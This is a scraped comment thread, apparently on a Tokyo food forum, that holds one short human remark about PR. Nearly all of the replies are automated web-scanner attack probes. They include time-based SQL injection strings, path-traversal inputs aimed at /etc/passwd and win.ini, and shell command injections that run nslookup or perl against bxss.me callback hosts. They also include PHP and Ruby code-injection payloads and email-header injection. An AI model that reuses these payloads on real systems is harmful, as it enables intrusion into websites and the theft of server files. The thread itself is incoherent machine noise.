\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727140577

re: mirugai

WEB-INF/web.xml

1727140578

re: mirugai

WEB-INF\web.xml

1727140579

re: mirugai

1

1727140974

re: mirugai

1

1727140985

re: mirugai

-1 OR 2+511-511-1=0+0+0+1 --

1727140986

re: mirugai

-1 OR 3+511-511-1=0+0+0+1 --

1727140987

re: mirugai

-1 OR 2+535-535-1=0+0+0+1

1727140987

re: mirugai

-1 OR 3+535-535-1=0+0+0+1

1727140988

re: mirugai

-1' OR 2+425-425-1=0+0+0+1 --

1727140988

re: mirugai

-1' OR 3+425-425-1=0+0+0+1 --

1727140989

re: mirugai

-1' OR 2+384-384-1=0+0+0+1 or 'nkBUnyV9'='

1727140989

re: mirugai

-1' OR 3+384-384-1=0+0+0+1 or 'nkBUnyV9'='

1727140989

re: mirugai

-1" OR 2+398-398-1=0+0+0+1 --

1727140990

re: mirugai

-1" OR 3+398-398-1=0+0+0+1 --

1727140990

re: mirugai

if(now()=sysdate(),sleep(15),0)

1727141001

re: mirugai

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141013

re: mirugai

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141026

re: mirugai

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141041

re: mirugai

-1; waitfor delay '0:0:15' --

1727141055

re: mirugai

-1); waitfor delay '0:0:15' --

1727141070

re: mirugai

1 waitfor delay '0:0:15' --

1727141084

re: mirugai

5lRS7Jzu'; waitfor delay '0:0:15' --

1727141100

re: mirugai

-5 OR 306=(SELECT 306 FROM PG_SLEEP(15))--

1727141119

re: mirugai

-5) OR 792=(SELECT 792 FROM PG_SLEEP(15))--

1727141136

re: mirugai

-1)) OR 782=(SELECT 782 FROM PG_SLEEP(15))--

1727141152

re: mirugai

yyUpVaQd' OR 989=(SELECT 989 FROM PG_SLEEP(15))--

1727141170

re: mirugai

RToHKyDP') OR 653=(SELECT 653 FROM PG_SLEEP(15))--

1727141188

re: mirugai

tfYkmyfa')) OR 34=(SELECT 34 FROM PG_SLEEP(15))--

1727141205

re: mirugai

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141223

re: mirugai

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141238

re: mirugai

'||(select 1 from (select pg_sleep(15))x)||'

1727141255

re: mirugai

''||(select 1 from (select pg_sleep(15))x)||''

1727141269

re: mirugai

1'"

1727141269

re: mirugai

@@5BSix

1727141272

re: mirugai

1

1727383026

re: mirugai

1

1727383026

re: mirugai

1

1727383026

re: mirugai

1

1727383579

re: mirugai

1

1727383580

re: mirugai

1

1727383580

Thanks for the replies. I suspected the reality was less impressive than the PR.

1680674664 Reply
Add photos

re: thetokyogourmet

4yW8735v

1697002545

re: thetokyogourmet

1*

1697002546

re: thetokyogourmet

1*

1697002546

re: thetokyogourmet

1*

1697002546

re: thetokyogourmet

1*

1697002546

re: thetokyogourmet

-1 OR 2+272-272-1=0+0+0+1

1697002547

re: thetokyogourmet

-1 OR 3+272-272-1=0+0+0+1

1697002547

re: thetokyogourmet

if(now()=sysdate(),sleep(15),0)

1697002552

re: thetokyogourmet

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002557

re: thetokyogourmet

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002561

re: thetokyogourmet

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002566

re: thetokyogourmet

-1; waitfor delay '0:0:15' --

1697002571

re: thetokyogourmet

-1); waitfor delay '0:0:15' --

1697002575

re: thetokyogourmet

1 waitfor delay '0:0:15' --

1697002580

re: thetokyogourmet

YmD9VZGs'; waitfor delay '0:0:15' --

1697002584

re: thetokyogourmet

-5 OR 426=(SELECT 426 FROM PG_SLEEP(15))--

1697002588

re: thetokyogourmet

-5) OR 162=(SELECT 162 FROM PG_SLEEP(15))--

1697002593

re: thetokyogourmet

-1)) OR 108=(SELECT 108 FROM PG_SLEEP(15))--

1697002598

re: thetokyogourmet

W8ZV9sRO' OR 691=(SELECT 691 FROM PG_SLEEP(15))--

1697002602

re: thetokyogourmet

qpGtXlPn

1697002603

re: thetokyogourmet

1*

1697002603

re: thetokyogourmet

1*

1697002604

re: thetokyogourmet

1*

1697002604

re: thetokyogourmet

1*

1697002604

re: thetokyogourmet

-1 OR 2+900-900-1=0+0+0+1

1697002604

re: thetokyogourmet

-1 OR 3+900-900-1=0+0+0+1

1697002605

re: thetokyogourmet

BQPiKUGM') OR 835=(SELECT 835 FROM PG_SLEEP(15))--

1697002606

re: thetokyogourmet

if(now()=sysdate(),sleep(15),0)

1697002609

re: thetokyogourmet

RqEq6rqy')) OR 149=(SELECT 149 FROM PG_SLEEP(15))--

1697002611

re: thetokyogourmet

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002615

re: thetokyogourmet


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002617

re: thetokyogourmet

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002619

re: thetokyogourmet


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002621

re: thetokyogourmet

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002623

re: thetokyogourmet

'||(select 1 from (select pg_sleep(15))x)||'

1697002625

re: thetokyogourmet

-1; waitfor delay '0:0:15' --

1697002627

re: thetokyogourmet

''||(select 1 from (select pg_sleep(15))x)||''

1697002629

re: thetokyogourmet

1'"

1697002629

re: thetokyogourmet

@@NO4a6

1697002630

re: thetokyogourmet

-1); waitfor delay '0:0:15' --

1697002632

re: thetokyogourmet

1 waitfor delay '0:0:15' --

1697002637

re: thetokyogourmet

56oVhdtu'; waitfor delay '0:0:15' --

1697002641

re: thetokyogourmet

-5 OR 297=(SELECT 297 FROM PG_SLEEP(15))--

1697002646

re: thetokyogourmet

-5) OR 554=(SELECT 554 FROM PG_SLEEP(15))--

1697002650

re: thetokyogourmet

-1)) OR 126=(SELECT 126 FROM PG_SLEEP(15))--

1697002654

re: thetokyogourmet

Hyj4pUip' OR 511=(SELECT 511 FROM PG_SLEEP(15))--

1697002662

re: thetokyogourmet

lpK0saFJ') OR 789=(SELECT 789 FROM PG_SLEEP(15))--

1697002665

re: thetokyogourmet

CwrTGiQV')) OR 766=(SELECT 766 FROM PG_SLEEP(15))--

1697002669

re: thetokyogourmet


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002673

re: thetokyogourmet


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002677

re: thetokyogourmet

'||(select 1 from (select pg_sleep(15))x)||'

1697002682

re: thetokyogourmet

''||(select 1 from (select pg_sleep(15))x)||''

1697002685

re: thetokyogourmet

1'"

1697002686

re: thetokyogourmet

@@f4i8a

1697002686

re: thetokyogourmet

1D9MhAQEO

1727141165

re: thetokyogourmet

response.write(9402255*9079911)

1727141170

re: thetokyogourmet

%0abcc:074625.67-13762.67.b436f.19990.2@bxss.me

1727141170

re: thetokyogourmet

<esi:include src="http://bxss.me/rpb.png"/>

1727141170

re: thetokyogourmet

'+response.write(9402255*9079911)+'

1727141170

re: thetokyogourmet

to@example.com>%0d%0abcc:074625.67-13763.67.b436f.19990.2@bxss.me

1727141171

re: thetokyogourmet

"+response.write(9402255*9079911)+"

1727141171

re: thetokyogourmet

${9999840+10000311}

1727141172

re: thetokyogourmet

../../../../../../../../../../../../../../etc/passwd

1727141173

re: thetokyogourmet

../../../../../../../../../../../../../../windows/win.ini

1727141174

re: thetokyogourmet

file:///etc/passwd

1727141175

re: thetokyogourmet

../../../../../../../../../../../../../../../proc/version

1727141176

re: thetokyogourmet

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141177

re: thetokyogourmet

)

1727141178

re: thetokyogourmet

../../../../../../../../../../etc/passwd%00.jpg

1727141178

re: thetokyogourmet

'.gethostbyname(lc('hitwl'.'ncgowndr40dd7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(68).chr(112).chr(82).'

1727141178

re: thetokyogourmet

!(()&&!|*|*|

1727141179

re: thetokyogourmet

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141179

re: thetokyogourmet

".gethostbyname(lc("hitfv"."iydgahnebe6a0.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(77).chr(109).chr(82)."

1727141179

re: thetokyogourmet

^(#$!@#$)(()))******

1727141180

re: thetokyogourmet

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141180

re: thetokyogourmet

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141181

re: thetokyogourmet

/etc/passwd

1727141182

re: thetokyogourmet

1727141182

re: thetokyogourmet

%2fetc%2fpasswd

1727141182

re: thetokyogourmet

bxss.me/t/xss.html?%00

1727141183

re: thetokyogourmet

echo nluogo$()\ gvfike\nz^xyu||a #' &echo nluogo$()\ gvfike\nz^xyu||a #|" &echo nluogo$()\ gvfike\nz^xyu||a #

1727141183

re: thetokyogourmet

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141183

re: thetokyogourmet

"+"A".concat(70-3).concat(22*4).concat(114).concat(75).concat(116).concat(76)+(require"socket"
Socket.gethostbyname("hitcc"+"ohegohlkba321.bxss.me.")[3].to_s)+"

1727141184

re: thetokyogourmet

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141184

re: thetokyogourmet

&echo nstvfa$()\ xkzrfw\nz^xyu||a #' &echo nstvfa$()\ xkzrfw\nz^xyu||a #|" &echo nstvfa$()\ xkzrfw\nz^xyu||a #

1727141184

re: thetokyogourmet

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141184

re: thetokyogourmet

'+'A'.concat(70-3).concat(22*4).concat(97).concat(75).concat(122).concat(78)+(require'socket'
Socket.gethostbyname('hitht'+'celsobil8d958.bxss.me.')[3].to_s)+'

1727141185

re: thetokyogourmet

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141185

re: thetokyogourmet

|echo scinwf$()\ umbdqj\nz^xyu||a #' |echo scinwf$()\ umbdqj\nz^xyu||a #|" |echo scinwf$()\ umbdqj\nz^xyu||a #

1727141185

re: thetokyogourmet

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141185

re: thetokyogourmet

1727141186

re: thetokyogourmet

(nslookup hitnggkvpevnq69651.bxss.me||perl -e "gethostbyname('hitnggkvpevnq69651.bxss.me')")

1727141186

re: thetokyogourmet

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141186

re: thetokyogourmet

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141186

re: thetokyogourmet

1727141187

re: thetokyogourmet

'"

1727141187

re: thetokyogourmet

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141187

re: thetokyogourmet

$(nslookup hitaewqhxeehmdbbaa.bxss.me||perl -e "gethostbyname('hitaewqhxeehmdbbaa.bxss.me')")

1727141187

re: thetokyogourmet

';print(md5(31337));$a='

1727141187

re: thetokyogourmet

/etc/shells

1727141188

re: thetokyogourmet

<!--

1727141188

re: thetokyogourmet

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141188

re: thetokyogourmet

&nslookup hityamlktnwpw7e504.bxss.me&'\"`0&nslookup hityamlktnwpw7e504.bxss.me&`'

1727141188

re: thetokyogourmet

";print(md5(31337));$a="

1727141188

re: thetokyogourmet

c:/windows/win.ini

1727141188

re: thetokyogourmet

file:///etc/passwd

1727141189

re: thetokyogourmet

&(nslookup hitivgdznofcva6ab4.bxss.me||perl -e "gethostbyname('hitivgdznofcva6ab4.bxss.me')")&'\"`0&(nslookup hitivgdznofcva6ab4.bxss.me||perl -e "gethostbyname('hitivgdznofcva6ab4.bxss.me')")&`'

1727141189

re: thetokyogourmet

${@print(md5(31337))}

1727141189

re: thetokyogourmet

bxss.me

1727141189

re: thetokyogourmet

/\../\../\../\../\../\../\../etc/passwd

1727141189

re: thetokyogourmet

|(nslookup hitnhgtoqrmzy4c2e1.bxss.me||perl -e "gethostbyname('hitnhgtoqrmzy4c2e1.bxss.me')")

1727141190

re: thetokyogourmet

${@print(md5(31337))}\

1727141190

re: thetokyogourmet

/WEB-INF/web.xml

1727141190

re: thetokyogourmet

`(nslookup hitqldsncwexs1a7af.bxss.me||perl -e "gethostbyname('hitqldsncwexs1a7af.bxss.me')")`

1727141190

re: thetokyogourmet

'.print(md5(31337)).'

1727141191

re: thetokyogourmet

C:\WINDOWS\system32\drivers\etc\hosts

1727141191

re: thetokyogourmet

;(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")|(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")&(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")

1727141191

re: thetokyogourmet

../../../../../../../../../../windows/win.ini%00.jpg

1727141192

re: thetokyogourmet

/../../../../../../../../../../boot.ini

1727141193

re: thetokyogourmet

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141193

re: thetokyogourmet

..\..\..\..\..\..\..\..\windows\win.ini

1727141194

re: thetokyogourmet

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141195

re: thetokyogourmet

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141196

re: thetokyogourmet

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141197

re: thetokyogourmet

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141198

re: thetokyogourmet

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141199

re: thetokyogourmet

WEB-INF/web.xml

1727141200

re: thetokyogourmet

WEB-INF\web.xml

1727141201

re: thetokyogourmet

1

1727141614

re: thetokyogourmet

1

1727141651

re: thetokyogourmet

-1 OR 2+632-632-1=0+0+0+1 --

1727141652

re: thetokyogourmet

-1 OR 3+632-632-1=0+0+0+1 --

1727141652

re: thetokyogourmet

-1 OR 2+859-859-1=0+0+0+1

1727141653

re: thetokyogourmet

-1 OR 3+859-859-1=0+0+0+1

1727141653

re: thetokyogourmet

-1' OR 2+682-682-1=0+0+0+1 --

1727141653

re: thetokyogourmet

-1' OR 3+682-682-1=0+0+0+1 --

1727141654

re: thetokyogourmet

-1' OR 2+569-569-1=0+0+0+1 or 'eKcLoK1t'='

1727141654

re: thetokyogourmet

-1' OR 3+569-569-1=0+0+0+1 or 'eKcLoK1t'='

1727141655

re: thetokyogourmet

-1" OR 2+160-160-1=0+0+0+1 --

1727141655

re: thetokyogourmet

-1" OR 3+160-160-1=0+0+0+1 --

1727141656

re: thetokyogourmet

if(now()=sysdate(),sleep(15),0)

1727141689

re: thetokyogourmet

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141702

re: thetokyogourmet

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141715

re: thetokyogourmet

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141726

re: thetokyogourmet

-1; waitfor delay '0:0:15' --

1727141737

re: thetokyogourmet

-1); waitfor delay '0:0:15' --

1727141748

re: thetokyogourmet

1 waitfor delay '0:0:15' --

1727141759

re: thetokyogourmet

dPukxIMd'; waitfor delay '0:0:15' --

1727141770

re: thetokyogourmet

-5 OR 720=(SELECT 720 FROM PG_SLEEP(15))--

1727141779

re: thetokyogourmet

-5) OR 160=(SELECT 160 FROM PG_SLEEP(15))--

1727141787

re: thetokyogourmet

-1)) OR 730=(SELECT 730 FROM PG_SLEEP(15))--

1727141796

re: thetokyogourmet

8ah2nDAU' OR 612=(SELECT 612 FROM PG_SLEEP(15))--

1727141804

re: thetokyogourmet

XchLWGAX') OR 294=(SELECT 294 FROM PG_SLEEP(15))--

1727141813

re: thetokyogourmet

7EWRXkhw')) OR 292=(SELECT 292 FROM PG_SLEEP(15))--

1727141826

re: thetokyogourmet

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141837

re: thetokyogourmet

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141848

re: thetokyogourmet

'||(select 1 from (select pg_sleep(15))x)||'

1727141860

re: thetokyogourmet

''||(select 1 from (select pg_sleep(15))x)||''

1727141873

re: thetokyogourmet

1'"

1727141873

re: thetokyogourmet

@@Adde2

1727141875

re: thetokyogourmet

1

1727383035

re: thetokyogourmet

1

1727383036

re: thetokyogourmet

1

1727383036

re: thetokyogourmet

1

1727383588

re: thetokyogourmet

1

1727383589

re: thetokyogourmet

1

1727383589

